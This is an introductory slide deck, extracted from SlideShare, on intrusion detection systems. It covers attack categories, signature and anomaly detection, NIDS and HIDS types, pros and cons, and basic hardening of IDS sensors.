SlideShare utilise les cookies pour améliorer les fonctionnalités et les performances, et également pour vous montrer des publicités pertinentes. Si vous continuez à naviguer sur ce site, vous acceptez l’utilisation de cookies. Consultez nos Conditions d’utilisation et notre Politique de confidentialité.
SlideShare utilise les cookies pour améliorer les fonctionnalités et les performances, et également pour vous montrer des publicités pertinentes. Si vous continuez à naviguer sur ce site, vous acceptez l’utilisation de cookies. Consultez notre Politique de confidentialité et nos Conditions d’utilisation pour en savoir plus.
Intrusion detection system or IDS is a security software which is designed to help administrator to automatically alert or notify at any case when a user try to compromise information system through any malicious activities or at point where Violation of security policies are taken
Intrusion Detection System or IDS is a security software
which is designed to help administrator to automatically
alert or notify at any case when a user tries to compromise
information system through any malicious activities or at
point where violation of security policies are taken. It helps
to deals with such attacks by inspecting all of the inbound or
outbound traffic on a network.
Types Of Intrusions / Attacks
Web Based Attacks
SQL Injection, Web Shells
LFI, RFI and XSS Attacks
Network Based Attacks
Denial Of Service attacks
Scanning ports and services
Replication of Worms, Trojan, Virus
Spoofing Attacks ( Arpspoof, Dns spoof Attacks )
Zero Day Attacks
Attacks that aren’t known.
How detection is performed in
IDS Signature Based detection- This type of detection work well with the
threads that are already determined or known.
Anomaly-based detection-- This detection works on the basis of Comparison.
It determines the traits of a normal action against characteristics that marks
them as abnormal.
A Typical Intrusion detection functions include :
Monitoring and analyzing both user and system activities
Analyzing system configurations and vulnerabilities
Assessing system and file integrity
Ability to recognize typical patterns of attacks
Analysis of abnormal activity patterns
Tracking user policy violations
Major component of an IDS System
Network Intrusion Detection System (NIDS): This
does analysis for traffic on a whole subnet and will
make a match to the traffic passing by to the attacks
already known in a library of known attacks.
Network Node Intrusion Detection System (NNIDS):
This is similar to NIDS, but the traffic is only monitored on a single host, not a
Host Intrusion Detection System (HIDS): This takes a
“picture” of an entire system’s file set and compares
it to a previous picture. If there are significant
differences, such as missing files, it alerts the
PROS of an IDS System
CAN add a greater degree of integrity to the rest of your infrastructure
CAN trace user activity from point of entry to point of impact
CAN recognize and report alterations to data
CAN automate a task of monitoring the Internet searching for the latest attacks
CAN detect when your system is under attack
CAN make the security management of your system possible bynon-expert staff
CONS Related to an IDS System
CAN NOT compensate for a weak identification and authentication mechanisms
CAN NOT conduct investigations of attacks without human intervention
CAN NOT compensate for weaknesses in network protocols
CAN NOT analyze all the traffic on a busy network
CAN NOT always deal with problems involving packet-level attacks
CAN NOT deal with some of the modern network hardware and features
How to protect IDS
• Don’t run any service on your IDS sensor
• The platform on which you are Running IDS should be patched with the
latest release from your vendor
• Configure the IDS machine so that it doesn't respond to ping packets
• User account should not be created except those that are necessary